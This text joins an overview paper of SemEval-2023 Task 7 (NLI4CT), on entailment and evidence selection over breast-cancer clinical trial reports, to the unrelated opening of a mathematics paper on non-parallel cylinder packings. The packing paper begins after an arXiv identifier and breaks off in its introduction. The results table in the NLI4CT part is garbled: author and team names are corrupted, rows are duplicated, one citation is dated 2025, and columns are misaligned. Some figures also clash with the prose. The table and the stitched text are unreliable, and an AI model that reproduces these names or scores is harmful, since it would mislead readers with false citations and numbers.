Figure 1: We propose two tasks for reasoning on clinical trial data expressed in natural language. Firstly, to predict the entailment of a **Statement** and a **CTR** premise, and secondly, to extract evidence to support the label.
The inference task requires multi-hop reasoning, that is, the ability to combine information from multiple pieces of text to draw inferences (Jansen et al., 2018; Dalvi et al., 2021). Previous works have shown that although multi-hop reasoning can be implemented on large-scale scientific tasks, there is a significant drop-off in performance as the number of necessary hops increases (Valentino et al., 2022, 2021; Thayaparan et al., 2022, 2021). A large proportion of the NLI4CT dataset instances require the construction of inference chains in this drop-off range. Additionally, numerical and quantitative reasoning is required to perform inference on NLI4CT, exemplified in Figure 1. Studies have shown that transformer-based models are unable to consistently apply this type of reasoning, instead relying on shallow heuristics for predictions (Patel et al., 2021; Ravichander et al., 2019; Galashov et al., 2019). In the NLI4CT inference task, both the multi-hop and the numerical reasoning have the added complexity of being applied to CTRs. Studies have demonstrated that the word distribution shift from general domain corpora to biomedical corpora, such as CTRs, caused by the increased prevalence of aliases, acronyms, and biomedical terminology, represents a significant detriment to model performance (Lee et al., 2019; Grossman Liu et al., 2021; Shickel et al., 2017; Jiang et al., 2011; Moon et al., 2015; Jimeno-Yepes et al., 2011; Pesaranghader et al., 2019; Jin et al., 2019; Wu et al., 2015). This word distribution shift challenge is also present in the evidence selection task. Although the evidence selection task is arguably simpler than the inference task, its importance cannot be overstated. State-of-the-art NLI models consistently struggle to attend to relevant pieces of evidence when applied to large texts (DeYoung et al., 2020). Additionally, the ability to filter out irrelevant pieces of text reduces the likelihood of distractors (Mishra and Sachdeva, 2020) and reduces the length of the input for inference, improving efficiency. This paper introduces SemEval-2023 Task 7 - Multi-Evidence Natural Language Inference for Clinical Trial Data (NLI4CT) - for biomedical NLI and evidence extraction and presents a detailed analysis of the performance of the participating systems. We report the following conclusions: * The highest scoring system (Zhou et al., 2023) @THiFLY achieved an F1 score of 0.856 and 0.853 on the entailment task and the evidence selection task respectively. * The tasks are challenging: most submissions did not significantly outperform the majority class baseline on the entailment task. * On average, performance on the evidence selection task was higher than on the entailment task. * Increasing the number of model parameters leads to a direct improvement in performance, far outweighing the effect of biomedical pre-training. ## 2 Related Works There are many existing expert-annotated resources for clinical NLI. The TREC 2021 Clinical Track (Soboroff, 2021) is a large-scale information retrieval task to match patient descriptions to clinical trials for which they are eligible. 
Evidence Inference 2.0 (DeYoung et al., 2020) is a Question-Answering (QA) task and span selection task where, provided with an outcome, an intervention, and a comparator intervention, systems must infer if the intervention resulted in a significant increase, a significant decrease, or no significant difference in the outcome measurement, compared to the comparator, and identify spans that support this inference. The MEDNLI (Romanov and Shivade, 2018) dataset is an entailment task to infer the entailment relation between a short piece of text extracted from medical history notes and an annotated statement. None of the aforementioned tasks encompass the full complexity of NLP over CTRs, that is, the capability to reason over all CTR sections and to simultaneously carry out biomedical and numerical inference; instead, each focuses on one specific CTR section. Additionally, these tasks often have repetitive inference chains, i.e. matching statements for eligibility, or retrieving measurements and comparing them. In contrast, NLI4CT instances cover all CTR sections and contain minimal repetition in inference chains, as there is no set template for statements. Currently, Large Language Models (LLMs) achieve the best results for clinical NLI (Gu et al., 2021; DeYoung et al., 2020). However, they suffer from a plethora of issues. LLMs demonstrate poor performance on quantitative reasoning and numerical operations within NLI (Ravichander et al., 2019; Galashov et al., 2019). Additionally, there is a notable drop in performance for LLMs pre-trained on general domain data when applied to biomedical tasks (Lee et al., 2019), partially aggravated by a lack of well-annotated clinical data (Kelly et al., 2019). NLI4CT is designed to assist in the development and benchmarking of models for clinical NLI. ## 3 Task Description NLI4CT contains two tasks, Task 1, textual entailment, and Task 2, evidence selection. Each instance in NLI4CT contains a CTR premise and a statement. Premises contain 5-500 tokens, describing either the results, eligibility criteria, intervention, or adverse events of a trial, and the statements are sentences with a length of 10-35 tokens (see example in Figure 1), which make one or more claims about the premise. On average, 7.74 of 21.67 facts within the premise are labeled as evidence. There are two types of instances in NLI4CT: single instances, where the statement makes a claim about one CTR, and comparison instances, where the statement makes claims comparing and contrasting two CTRs. To summarize: Task 1: Classify the inference relation between a CTR premise and a statement, as either an entailment or a contradiction, as shown in Figure 1. Task 2: Output a subset of facts from the CTR premise, necessary to justify the class predicted in Task 1. ## 4 Dataset The premises in NLI4CT are obtained from 1000 publicly available English-language breast cancer CTRs published on ClinicalTrials.gov. This data is maintained by the U.S. National Library of Medicine and is subject to the HIPAA Privacy Rule. The CTRs are split into 4 sections: * **Eligibility criteria**: A set of conditions patients must meet to participate in the trial. * **Intervention**: Detailed description of the type, dosage, frequency, and duration of treatments being studied. * **Results**: Reports the results of the patient cohorts in the trial with respect to a given outcome measurement. * **Adverse events**: Reports the (serious) signs and symptoms observed in patients during the clinical trial. 
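To make the instance structure described in Sections 3 and 4 concrete, the sketch below shows what a single-CTR instance might look like. The field names and values are illustrative placeholders only, not the official release schema.

```python
# Hypothetical sketch of one NLI4CT-style instance (field names and values
# are illustrative placeholders, not the official release schema).
instance = {
    "type": "Single",                    # "Single" or "Comparison"
    "section": "Results",                # Eligibility criteria, Intervention, Results, or Adverse events
    "primary_ctr_id": "NCT00000000",     # placeholder trial identifier
    "statement": "The primary trial reported a higher response rate in cohort 1 than in cohort 2.",
    "premise": [                         # the facts that make up the CTR section
        "Outcome measurement: overall response rate.",
        "Cohort 1: 45/100 patients responded.",
        "Cohort 2: 30/100 patients responded.",
    ],
    "label": "Entailment",               # Task 1 gold label ("Entailment" or "Contradiction")
    "evidence_indices": [1, 2],          # Task 2 gold evidence: facts needed to justify the label
}
print(len(instance["premise"]), instance["label"])
```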
A group of domain experts, including clinical trial organizers from a major cancer research center, took part in the annotation task. The annotators were given two CTR premises to generate an entailment statement. This is a short text that makes an objectively true claim about the contents of the premise. Annotators could choose to write a statement about one or both premises. Non-trivial statements typically involve summarization, comparison, negation, relation, inclusion, superlatives, aggregation, or rephrasing, and require understanding multiple rows of the premise. The annotators then select a subset of facts from the premise(s) that support the claims in the statement. Then a negative rewriting technique (Chen et al., 2019) was applied, modifying the previously produced entailment statement to contain objectively false claims while retaining the original sentence structure and length. This technique is used to reduce the likelihood of stylistic or linguistic patterns pertaining to either entailment or contradictory statements. Annotators then extract a subset of facts from the premise that contradict the claims in the false statement. The resulting dataset includes 2400 annotated statements with labels, premises, and evidence. The dataset was split 70/20/10 train/test/dev. The two classes and four sections are evenly distributed throughout the dataset and its splits. ## 5 Evaluation The same strategy is adopted for the evaluation of the results of both tasks. Task 1, the textual entailment task, is a binary classification task, so performance is measured using Precision, Recall, and Macro F1-score, comparing predicted labels against the gold labels. We also frame Task 2, the evidence selection task, as a binary classification task, classifying each fact in the premise as either relevant evidence or irrelevant; we compare the predicted labels against the gold labels and compute the Precision, Recall, and Macro F1-score. ## 6 Architectural Paradigms We observe 5 different categories of approaches described in the system papers, recorded in Table 1. Generative language models are designed to learn the joint probability distribution P(X,Y), where X is the input text, such as the statements or CTR premises, and Y is a probability output by a classification layer or a generated label from a decoder-only transformer. Conversely, discriminative language models encode the conditional probability P(Y|X), designed to encode the decision boundary between different classes. Biomedical pre-training refers to the technique of training a model on a large, unlabeled biomedical dataset, such as scientific articles or patient health records. This is used to encode general features and patterns within a domain, before fine-tuning on a specific task. Semantic rule-based models perform inference based on a set of human-defined asserted facts or axioms. Ontologies capture the categories, properties, and relations between the concepts of a particular domain. Ontology-based models extract entities from the input text and map them to nodes within the ontology to enrich the inputs with domain knowledge. ### Transformers The majority of submitted systems leverage discriminative transformer-based models. As shown in Table 1, 16 participants integrated discriminative transformer-based models into their submitted systems. 
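As a schematic illustration of this discriminative paradigm (not any particular participant's system), the sketch below scores a (statement, premise) pair with a pre-trained encoder and a 2-way classification head. The checkpoint name, example texts, and label mapping are illustrative assumptions; in practice the head is fine-tuned on the NLI4CT training split before use.

```python
# Minimal sketch of the generic discriminative set-up: encoder + 2-way head
# over a (statement, premise) pair. Checkpoint and label order are illustrative.
import torch
from transformers import AutoTokenizer, AutoModelForSequenceClassification

model_name = "microsoft/deberta-v3-base"   # illustrative choice of encoder
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForSequenceClassification.from_pretrained(model_name, num_labels=2)

statement = "Patients with liver disease are eligible for the primary trial."
premise = "Inclusion criteria: age over 18. Exclusion criteria: prior chemotherapy."

inputs = tokenizer(statement, premise, truncation=True, return_tensors="pt")
with torch.no_grad():
    logits = model(**inputs).logits
probs = torch.softmax(logits, dim=-1).squeeze()
# With an untrained head these probabilities are arbitrary; fine-tuning on the
# training split teaches the head to separate entailment from contradiction.
print({"contradiction": float(probs[0]), "entailment": float(probs[1])})
```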
Generally, a task-specific output layer is appended to the pre-trained layers and fine-tuned on the training set to output the probability of a statement being entailed, or a piece of evidence being relevant. Alternatively, 8/21 participants submitted systems based on generative models, as seen in Table 1. These models are either appended with a task-specific output layer and fine-tuned to output a probability, or directly output entailment/contradiction or relevant/irrelevant labels. ### Biomedical Pre-training The majority of participants leverage biomedical pre-training in their systems. As previously described, LLMs trained on general domain corpora generalize poorly on biomedical corpora. Therefore many participants choose to apply models that are pre-trained on biomedical texts, such as datasets of scientific articles and patient health records. ## 7 Results and Discussion During the 21-day evaluation period (January 10\({}^{th}\)-31\({}^{st}\), 2023), 40 participants submitted a total of 643 submissions for the entailment task, and 23 participants submitted a total of 364 submissions for the evidence selection task. In total, 21 participants submitted system papers. Submissions for which a system paper was not provided are omitted from the tables and discussion. The majority of systems fail to significantly outperform the majority-class baseline on the entailment task. Table 2 shows the F1 score, Recall, and Precision for Task 1. The collected results indicate that these tasks are challenging, with the majority of systems failing to achieve results significantly above the majority-class baseline (0.667 F1) on the entailment task. In particular, we observe several systems reporting 0.9-0.95 Recall and 0.5-0.55 Precision, indicating the systems were almost exclusively predicting the "entailment" class. All systems with submitted papers significantly outperform the random baseline (0.5 F1). The top-performing systems achieve significant gains across both tasks. Zhou et al. (2023) @THiFLY and Kanakarajan and Sankarasubbu (2023) @Saama AI Research lead the entailment task, while Stein et al. (2023) @EW-TSC, Vassileva et al. (2023) @FMI-SU, Vladika and Matthes (2023) @Sebis, Huang et al. (2023) @CPIC, Alameldin and Williamson (2023) @Clemson NLP, Bevan et al. (2023) @MDC and Rajamanickam and Rajaraman (2023) @I\({}^{2}\)R surpass 0.8 F1 on the evidence selection task. \begin{table} \begin{tabular}{l r} \hline \hline **Technique/Model Type** & **Submissions \#** \\ \hline Generative LLMs & 8 \\ \hline Discriminative LLMs & 16 \\ \hline Ontology-based & 1 \\ \hline Semantic rule-based & 1 \\ \hline Biomedical Pre-training & 12 \\ \hline \hline \end{tabular} \end{table} Table 1: Summary of the techniques and models implemented in the submissions. Figure 2: Graph comparing system F1 scores across the entailment task and the evidence selection task. The entailment task is more challenging than the evidence selection task. Table 2 shows the F1 score, Recall, and Precision for the evidence selection task. On average, systems report a +0.07 higher F1 score on the evidence selection task than on the entailment task, shown in Figure 2. This result was expected as the evidence selection task does not require systems to learn complex decision boundaries between the classes or to perform numerical inference. 
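As a quick check on the baseline figures quoted above, the snippet below scores a constant "entailment" predictor on a balanced binary test set. It assumes the quoted 0.667 majority baseline corresponds to F1 computed on the entailment class; the label encoding is an illustrative assumption.

```python
# Reproducing the quoted majority baseline, assuming a balanced binary test
# set and F1 scored on the "entailment" class (encoded as label 1).
from sklearn.metrics import f1_score, precision_score, recall_score

gold = [1, 0] * 600                      # balanced entailment / contradiction labels
always_entail = [1] * len(gold)          # predictor that always outputs "entailment"

print(precision_score(gold, always_entail))   # 0.5
print(recall_score(gold, always_entail))      # 1.0
print(f1_score(gold, always_entail))          # 2 * 0.5 * 1.0 / 1.5 ≈ 0.667
# The 0.9-0.95 Recall / 0.5-0.55 Precision pattern reported by several systems
# is consistent with behaviour close to this constant predictor.
```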
Submitted systems report higher Recall than Precision.On the evidence selection task, the \begin{table} \begin{tabular}{l l l l l l l l l l} **Work \# Team name** & **Approach** & **Generative/** & **Retrieval** & **Pre-training Datasets** & & **Task 1** & & & **Task 2** \\ & & & **Discriminative** & **type** & & & F1 & Precision & Recall & F1 & Precision & Recall \\ \hline Zhou et al. (2023) & MCNet, BiLSTM and SciFive model ensemble & G + D & Post & PubMed Abstract, PMC & 0.836 & 0.856 & 0.856 & 0.853 & 0.811 & 0.898 \\ ©THKEP & & & & & & & & & & \\ \hline Crankrankzyni and Salarararushboo (2023) & Interaction-fluented LLMs, Flans TS & G + D & - & - & & 0.834 & 0.768 & 0.912 & - & - & - \\ @Stein et al. (2023) & @Stein et al. (2023) & Ensemble of a pipeline and joint system based on DeBERT-v3 & D & Pre & - & & 0.798 & 0.777 & 0.820 & 0.818 & 0.772 & 0.868 \\ \hline Wang et al. (2025) & DeBERT-v3 large. & D & - & - & & 0.764 & 0.757 & 0.772 & - & - & - \\ @Know/Comp & & & & & & & & & & & \\ \hline Chen et al. (2023) & Soft voting ensemble mechanism based on Bi-SNCLE-NLP & Gault/BioBERT & D & Pre & MathNetNL, MelNLL and SNLI & 0.709 & 0.668 & 0.756 & 0.794 & 0.803 & 0.786 \\ \hline Alumeldin and Williamson (2023) & Gault/Tron-BERT & D & Pre & UFNS notes, MIMIC, MIMIC, WIATText, PMC, and extracted CTRs & & & & & & \\ \hline Rjamanickam and Rajaraman (2023) & Evidence level inferences with T5 & G + D & Pre & - & & & & & & & \\ \hline Rjamanickam and Rajaraman (2023) & Evidence level inferences with T5 & G + D & Pre & - & & & & & & & \\ \hline Rjamanickam (2023) & PubMedBERT for evidence retrieval, and Bi-SNCLE-NLP & D & Pre & PubMed abstracts, PMC & 0.695 & 0.668 & 0.724 & 0.804 & 0.814 & 0.795 \\ \hline RjMC & & & & & & & & & & & \\ \hline Zhao et al. (2023) & Zero-shot ChatGPT for entailment and DeBERT-9HW-TSC & G + D & Post & - & & & & & & & \\ \hline Padua and Phana, & Few-shot GPT-3.5 Davinci & G & - & - & & & & & & & \\ \hline Jorg et al. (2023) & BioBERT, supervised contrastive learning, and & D & - & PubMed Abstracts, PMC & 0.679 & 0.621 & 0.748 & - & - & - \\ \hline Rjayanickam and Rajaraman (2023) & BioBERT, unsupervised contrastive learning, and & D & - & PubMed Abstracts, PMC & 0.679 & 0.621 & 0.748 & - & - & - \\ \hline Altiosa and Abdullah (2023) \#UNet-HMM & Role-based Double Roberts-Large & D & - & - & & & & & & & \\ \hline Nove Mohamed and Sadanan (2023) & Semantic Rule based Clinical Data Analysis, & - & Post & - & & & & & & & \\ \hline Cenda Dias et al. (2023) \#W-TURGS & Evidence-SCI, using a modified PuxSCI, model and pre-trained Biomed RoBERTa checkpoints. & D & Pre & Semantic Scholar corpus & 0.666 & 0.500 & 0.996 & 0.681 & 0.615 & 0.764 \\ \hline Tiehanna et al. (2023) \#RjMC & Bio+Clinical/Dist/Bio Discharge Summary & D & - & MIMMIC-III, PubMed Abstract, PMC & 0.662 & 0.575 & 0.780 & - & - & - \\ @Stein et al. (2023) \#Stanford MLab & BERT, and ELECTRA Small ensemble & & - & & & & & & & \\ \hline Cencole et al. (2023) \#DI & Biomedical Ontology annotations, using & - & - & - & & & & & & & \\ \hline WikipediaTM & Scapiy & & & & & & & & & & \\ \hline Nieves (2023) @BIGR & Sentence-based BERT similarity model & D & Post & MIMIC III & 0.640 & 0.497 & 0.900 & 0.671 & 0.583 & 0.789 \\ \hline Wikipedia et al. (2023) \#DIGR & BioBERT model and a CNN model & D & - & PubMed Abstracts, PMC & 0.596 & 0.582 & 0.612 & - & - & - \\ \hline Wikolawiet et al. 
(2023) & Contextual Data Augmentation to fine-tune & D & - & PubMed Abstracts, PMC, EN Wiki + Books & & & & & & \\ \hline Huang et al. (2023) & Ensembles GPT-2 models with different & G + D & - & - & - & - & - & 0.810 & 0.789 & 0.833 \\ @CPIC & parameter sizes and random seeds. & & & & & & & & & & \\ \hline Muhendana et al. (2023) & BMDS and Word Mover Distance & - & - & - & - & - & - & 0.719 & 0.579 & 0.948 \\ \hline \end{tabular} \end{table} Table 2: Summary of the techniques and models implemented in the leaderboard submissions. (G) Generative model, (D) Discriminative model, (Post) Evidence retrieved after entailment, (Pre) Evidence retrieved before entailment. vast majority of systems record a higher Recall than Precision, with an average difference of +0.055 higher Recall, this disparity is increasingly important with the top 5 systems, with an average difference of +0.077. A potential cause for the disparity between Precision and Recall results is statements such as "Patients with liver disease are eligible for the primary trial" where the full eligibility criteria must be returned, to provide evidence that there are no conditions against liver disease. This incentivizes systems to retrieve a large proportion of the premise, and perhaps more importantly to intentionally retrieve pieces of text that are not relevant to entities contained in the statement (liver disease). However, we hypothesize that the cost of incorrectly labeling relevant information as irrelevant is much more significant than the cost of including distracting information. This is because the entailment of a statement is often dependent on a single line of a premise. Therefore maximizing Recall, even at the cost of Precision may significantly improve evidence completeness. ### Foundational Model Architectures Generative models outperformed discriminative models on the entailment task.As shown in Table 2 the top 2 systems on the entailment task are based on generative models, specifically 2 variants of the T5 model (Raffel et al., 2020), SciFive (Phan et al., 2021) and Flan-T5 (Chung et al., 2022). Both of these models significantly outperform the next best system with +0.058 and +0.036 F1 respectively. It should be noted that SciFive is implemented in Zhou et al. (2023) @THiFLY, as part of an ensemble with Multi-granularity Inference Networks and BiLSTMs, and therefore the system results cannot be solely attributed to the generative components. DeBERTa-v3 outperforms other discriminative transformer-based models on both tasks. DeBERTa-v3-based systems consistently outperform systems that apply discriminative models, on both tasks. This is also observed across a range of different systems settings (Vladika and Matthes, 2023; Zhao et al., 2023; Wang et al., 2023). DeBERTa-v3 remains competitive with the top generative approaches. Increase in model size is correlated with an increase in performance.An increase in model size, as in models with a higher number of parameters, is strongly correlated with better performance on both Tasks. The top 5 systems in both tasks are exclusively composed of Mega Language Models (MLM) such as T5 and DeBERTa-v3-large. Additionally, Vladika and Matthes (2023); Kanakarajan and Sankarasubbu (2023) and Wang et al. (2023) all report MLMs significantly outperforming comparatively smaller models within their individual systems. ### Rule-based systems Rule-based approaches are less competitive than MLMs.Conceicao et al. 
(2023) @lasige-BioTM experiments with a hybrid system, using the _en_core_sci_lg_ spaCy pipeline to extract entities from CTR premises and retrieving their ancestors from biomedical ontologies, then computing the shortest dependency path between entities, assisted with Counts and Measurements Rules to process numerical values. The statement is then combined with the premise and classified using cosine similarity. Noor Mohamed and Srinivasan (2023) @SSNSheerinKavitha applies a semantic rule-based system consisting of a Negation equivalence rule, Double negation rule, Deductive reasoning rule, and a Condition-based equivalence rule. Classification is obtained using TF-IDF vectors and RBF-Kernel distance similarity, and evidence is selected using BM25. As seen in Table 2, these systems are not competitive with the top-performing MLMs; however, if this disparity could be corrected, symbolic models inherently offer a higher level of transparency and interpretability than current neural models. ### Data augmentation Data augmentation does not result in a significant performance increase. Correa Dias et al. (2023) investigates transfer learning opportunities by adding a neutral class to NLI4CT, and merging it with MultiNLI (Williams et al., 2018) and MedNLI (Romanov and Shivade, 2018) to train their system. Vassileva et al. (2023) @FMI-SU annotates premise facts with structural context information, attaching trial names, cohort numbers, and parent subsection headings. They observed that the trial name does not improve performance, in some cases even adding noise, but showed some improvement with cohort and subsection annotations. Alameldin and Williamson (2023) @Clemson NLP compile an additional 9000 CTRs, and train a GatorTron model with a masked-language modeling objective for one epoch, before fine-tuning on NLI4CT. Results from this experiment reveal minor performance gains from the additional training data. Takehana et al. (2023) @Stanford Mlab uses a combination of back translation, synonym replacement, random insertions, deletions, and swapping of words on NLI4CT to quadruple the size of the training set. The results presented in Table 2 demonstrate that data augmentation does not inherently result in improved performance, and highlight the importance of selecting suitable tasks, data, or annotations, with respect to the target domain. ### Biomedical Pre-training There is no consistently superior biomedical pre-training strategy. Models pre-trained on the PubMed Abstract and PubMed Central (PMC) datasets were implemented in 6/21 systems, including the top-performing system Zhou et al. (2023) @THiFLY. Additionally, 4/21 systems use models pre-trained on MIMIC III. There is no observable correlation between pre-training data and model performance. Biomedical pre-training is not sufficient to achieve state-of-the-art performance. As seen in Table 2, 3/5 of the top 5 systems for the entailment task and the evidence selection task do not apply any biomedical pre-training strategies. Furthermore, Kanakarajan and Sankarasubbu (2023) @Saama AI Research demonstrates that large generative models are capable of outperforming the majority-class baseline on the entailment task, even in a zero-shot setting. Additionally, Vladika and Matthes (2023) and Wang et al. (2023) record DeBERTa-v3 (He et al., 2021) significantly outperforming comparatively smaller models pre-trained on biomedical data. 
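As a generic illustration of the word-level operations mentioned in the Data augmentation subsection above (random swaps and deletions), the sketch below applies two such perturbations to a statement. It is not any participant's actual pipeline, and back translation or synonym replacement would require additional resources.

```python
# Generic word-level augmentation sketch (random swap and random deletion);
# illustrative only, not the participants' actual augmentation pipeline.
import random

def random_swap(tokens, n_swaps=1):
    tokens = tokens[:]
    for _ in range(n_swaps):
        if len(tokens) < 2:
            break
        i, j = random.sample(range(len(tokens)), 2)
        tokens[i], tokens[j] = tokens[j], tokens[i]
    return tokens

def random_deletion(tokens, p=0.1):
    kept = [t for t in tokens if random.random() > p]
    return kept or tokens        # never return an empty statement

statement = "the primary trial recorded a higher response rate in cohort 1".split()
print(" ".join(random_swap(statement)))
print(" ".join(random_deletion(statement)))
```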
### Evidence-based NLI Many of the discriminative models have a limited input length, often smaller than the CTR premise token length (Alameldin and Williamson, 2023). Therefore, extracting a condensed set of evidence facts prevents the information from being lost to truncation. Even for generative models adapted to receive longer sequences of text, there is still a risk of distractors present in the CTR premise interfering with the inference process, particularly with respect to numerical inference. Retrieving evidence before inference does not result in better entailment task performance. Systems that first execute the evidence selection task, extracting relevant evidence from the premise with respect to the statement and then using the retrieved evidence for the entailment task (Pre), do not demonstrate significantly higher F1 than models which perform inference over the entire premise (Post), as shown in Table 2. As mentioned previously, the cost of excluding relevant information is significant, and systems that perform inference over the entire premise circumvent this cost as they effectively have an evidence extraction Recall of 1.0 at the inference step. Retrospective evidence retrieval induces confirmation bias. 11 participants submitted to both tasks, and 6 of them opt to first classify the entailment and then retrieve evidence from the premise to support the classification. Conversely, 5 participants first extract relevant evidence and then classify the entailment based on selected evidence. There is no significant difference in the results of these clusters for the entailment task; however, for the evidence selection task, systems that first collect evidence average +0.045 F1 and +0.07 Precision compared to those that retrospectively select evidence. These clusters report identical average Recall. Therefore, we hypothesize that retrospective systems exhibit confirmation bias, as selected evidence must be relevant to both the statement and the predicted label. The expected effects of reducing the input size by filtering out irrelevant parts of the premise are not evident in the reported results. ### Limitations Joint inference systems may generalize poorly without prior knowledge. NLI4CT was constructed using a negative-rewriting strategy (Section 4); this results in one contradictory statement and one entailment statement for each CTR premise. Alissa and Abdullah (2023) @JUST-KM and Zhou et al. (2023) @THiFLY leverage this feature. These systems perform inference over statement pairs with shared premises and assign the entailment label to the statement with the highest confidence, and then assign the contradiction label to the remaining statement, regardless of confidence. Zhou et al. (2023) @THiFLY reports that this process improves entailment task performance by +0.8 F1. 
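A minimal sketch of this statement-pair heuristic is shown below: for two statements that share a premise, the one with the higher predicted entailment probability receives the Entailment label and the other is forced to Contradiction. The scores used here are placeholders.

```python
# Pairwise consistency heuristic over statements sharing a premise, as
# described above; the probability scores are placeholder values.
def label_statement_pair(score_a: float, score_b: float):
    """score_* is a model's predicted probability that the statement is entailed."""
    if score_a >= score_b:
        return "Entailment", "Contradiction"
    return "Contradiction", "Entailment"

print(label_statement_pair(0.71, 0.64))   # ('Entailment', 'Contradiction')
```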
The limitations of this approach are that it is heavily reliant on the knowledge that only one statement in each pair is entailed, and therefore the approach may generalize poorly where this knowledge is unavailable. ## 8 Statistical Artifacts Statistical characteristics such as imbalanced sequence lengths, token distributions, or discriminative conditions that are disproportionately associated with a particular class can superficially inflate model performance (Herlihy and Rudinger, 2021). Alameldin and Williamson (2023) @Clemson NLP observes that systems are able to outperform the random baseline on the entailment task using only the statements, reporting an F1 of 0.584; this indicates that systems can rely exclusively on the presence of superficial statistical patterns within the collection of statements, without learning the underlying rules of the tasks. However, this is significantly below the majority baseline (0.66 F1), and as the entailment task is a binary classification task we conclude that the effects of these artifacts on the submitted results are very minimal. Alameldin and Williamson (2023) @Clemson NLP identifies minor differences in statement lengths across classes; however, in our analysis we did not find a significant difference. Additionally, we retrieve the 15 most frequently used tokens in the statements for both classes; although we observed some uneven distributions in the training set, these distributions were not present, or were even inversely correlated, in the test set. Therefore, we do not believe either of these characteristics explains the observed results, and claim that NLI4CT is robust to statistical biases. 
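In the spirit of the statement-only analysis above, the hedged sketch below is an artifact probe: a bag-of-words classifier that never sees the premise, whose F1 can be compared against the 0.5 random baseline. The data-loading step is schematic; `train` and `test` are assumed to be lists of (statement, label) pairs with 0/1 integer labels.

```python
# Statement-only probe for statistical artifacts: a classifier that ignores
# the premise. `train` and `test` are assumed to be lists of
# (statement, label) pairs, with label 1 = entailment and 0 = contradiction.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import f1_score

def statement_only_probe(train, test):
    vec = TfidfVectorizer(ngram_range=(1, 2), min_df=2)
    X_tr = vec.fit_transform([s for s, _ in train])
    y_tr = [y for _, y in train]
    clf = LogisticRegression(max_iter=1000).fit(X_tr, y_tr)
    X_te = vec.transform([s for s, _ in test])
    y_te = [y for _, y in test]
    # Compare against the 0.5 random baseline; a much higher score would
    # suggest class-correlated artifacts in the statements themselves.
    return f1_score(y_te, clf.predict(X_te))
```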
## 9 Conclusion This paper presents the systems and results submitted to the SemEval-2023 Task 7 on the NLI4CT dataset. The tasks are challenging, with the majority of submitted systems failing to significantly outperform the majority class baseline on the entailment task, potentially due to the requirement for sophisticated numerical reasoning, an elevated frequency of biomedical expressions, or the relatively small training set. We observe significantly better performance on the evidence selection task than on the entailment task, and we find that there is no consistent correlation between performance on the two tasks. The impact of biomedical pre-training is significantly less profound than expected, far outweighed by the effects of increased model size. There is a direct correlation between model size and task performance, with MLMs achieving the highest results in both tasks. There remains room for improvement on both tasks, potentially by exploiting data augmentation to increase the training set size, leveraging the zero-shot capabilities of models such as GPT and T5, or through the direct integration of domain knowledge from ontologies. A further error analysis is necessary to evaluate the impact of biomedical pre-training on MLMs, the consistency of performance across CTR sections, the generalization ability of models trained on NLI4CT, and the comparison of performance on numerical versus biomedical instances.
2310.06943
On non-parallel cylinder packings
In this paper we will discuss optimal lower and upper density of non-parallel cylinder packings in $R^{3}$ and similar problems. The main result of the paper is a proof of the conjecture of K. Kuperberg for upper density (existence of a non-parallel cylinder packing with upper density ${\pi}/{\sqrt{12}}$). Moreover, we prove that for every $\varepsilon > 0$ there exists a non-parallel cylinder packing with lower density greater than ${\pi}/{6} - \varepsilon$.
Ofek Eliyahu
2023-10-10T19:01:12Z
http://arxiv.org/abs/2310.06943v1
# On non-parallel cylinder packings ###### Abstract In this paper we will discuss optimal lower and upper density of non-parallel cylinder packings in \(\mathbb{R}^{3}\) and similar problems. The main result of the paper is a proof of K. Kuperberg's conjecture for upper density (existence of a non-parallel cylinder packing with upper density \(\pi/\sqrt{12}\)). Moreover, we prove that for every \(\varepsilon>0\) there exists a non-parallel cylinder packing with lower density greater than \(\frac{\pi}{6}-\varepsilon\). ## 1 Introduction Denote by \(B_{r}^{n}(x_{0})\subset\mathbb{R}^{n}\) the ball of radius \(r\) (with respect to the Euclidean metric) with center at a point \(x_{0}\). Let \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) be congruent disjoint bodies in \(\mathbb{R}^{n}\). We define \[\delta^{+}(\mathcal{C})=\limsup_{r\to\infty}\frac{\operatorname{Vol}\bigl{(}B_{r}^{n}(0)\cap\bigcup_{i=1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^{n}(0))},\] and \[\delta^{-}(\mathcal{C})=\liminf_{r\to\infty}\frac{\operatorname{Vol}\bigl{(}B_{r}^{n}(0)\cap\bigcup_{i=1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^{n}(0))}.\] Also, provided the limit exists, we define \[\delta(\mathcal{C})=\lim_{r\to\infty}\frac{\operatorname{Vol}\bigl{(}B_{r}^{n}(0)\cap\bigcup_{i=1}^{\infty}(C_{i})\bigr{)}}{\operatorname{Vol}(B_{r}^{n}(0))}.\] From now on we consider only the values \(n=3\) and \(n=2\), and for \(n=2\) we will denote \(\operatorname{Vol}\) by Area. We say that a circle packing in \(\mathbb{R}^{2}\) is a **lattice packing** if the centers of the circles form a lattice. In 1773, Joseph-Louis Lagrange proved that the highest-density lattice packing of circles is the hexagonal lattice. In 1942, Laszlo Fejes Toth proved that this packing is optimal among all circle packings (and that its density is \(\frac{\pi}{\sqrt{12}}\approx 0.9068\)). A proof of that can be found in [1]. Let \(\ell\) be a line in \(\mathbb{R}^{3}\), and let \(r>0\). The **infinite circular cylinder with axis \(\ell\) and radius \(r\)** is the set of all points in \(\mathbb{R}^{3}\) that lie at distance smaller than \(r\) from \(\ell\). Two infinite cylinders are said to be **parallel** if their axes are parallel. A collection \(\mathcal{C}\) of infinite cylinders with the same radius is called a **cylinder packing** if the interiors of the cylinders in \(\mathcal{C}\) are pairwise disjoint. A cylinder packing is called a **non-parallel cylinder packing** if no two cylinders in it are parallel. In 1989, A. Bezdek and W. Kuperberg, [2], proved that for every cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) one has \(\delta^{+}(\mathcal{C})\leq\frac{\pi}{\sqrt{12}}\). It is clear that this bound is tight among all cylinder packings. In 1990, K. Kuperberg, [3], proved that there exists a non-parallel cylinder packing \(\mathcal{C}=\{C_{i}\}_{i=1}^{\infty}\) with \(\delta^{-}(\mathcal{C})>0\) (for her packing, \(\delta^{-}(\mathcal{C})=\frac{\pi^{2}}{576}\approx 0.0171\)). She conjectured that the bound \(\frac{\pi}{\sqrt{12}}\) is also tight among non-parallel cylinder packings, and that there exists a non-parallel cylinder packing with density \(\frac{\pi}{\sqrt{12}}\) (she did not specify whether she meant lower or upper density). 
